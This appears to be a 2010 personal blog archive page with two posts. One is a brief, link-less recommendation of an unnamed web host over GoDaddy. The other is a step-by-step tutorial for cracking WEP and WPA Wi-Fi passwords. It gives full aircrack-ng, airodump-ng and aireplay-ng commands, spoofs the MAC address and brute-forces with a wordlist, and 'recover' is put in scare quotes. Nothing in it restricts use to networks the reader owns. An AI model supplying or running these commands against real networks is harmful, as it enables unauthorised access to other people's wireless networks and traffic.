Archive for October, 2010

Better hosting than godaddy

Wednesday, October 27th, 2010

Ok, so not every set of google suggested searches should be optimized for, but this one is a great term I came across the other day and have an opinion on.

It’s not hard to find better hosting than godaddy. After several years as a professional web developer, I’ve had many run-ins with godaddy’s limitations, yes, eventually they can fix it, but it’s going to take some time.

If you are interested in configuring your hosting in the specific way you need it visit,

They are incredible, so much better than godaddy hosting.

Ubuntu WPA WEP Cracking

Thursday, October 7th, 2010

Here is a quick tutorial to “recover” a lost wep, wpa password.

1) sudo apt-get install macchanger aircrack-ng
2) disable networking (right click on networking icon and uncheck the box for networking)
3) sudo airmon-ng stop wlan0
3) sudo ifconfig wlan0 down
4) sudo macchanger –mac 00:11:22:33:44:55
5) sudo airmon-ng start wlan0
6) sudo airodump-ng wlan0
7) Copy one of the essid’s
8) Ctrl+C to stop
9) open another terminal
10) sudo airodump-ng -c CHANNEL# -e ESSID -w filename –bssid ID# wlan0
11) open another terminal
12) sudo aireplay-ng -1 0 -a id# -h 00:11:22:33:44:55 wlan0
13) sudo aireplay-ng -3 -b id# -h 00:11…. wlan0 (leave running for 5 minutes or more)
14) aircrack-ng -b id# wifile.cap or if wpa sudo aircrack-ng -b id# -w (password file) wifile.cap
if it finds it your good.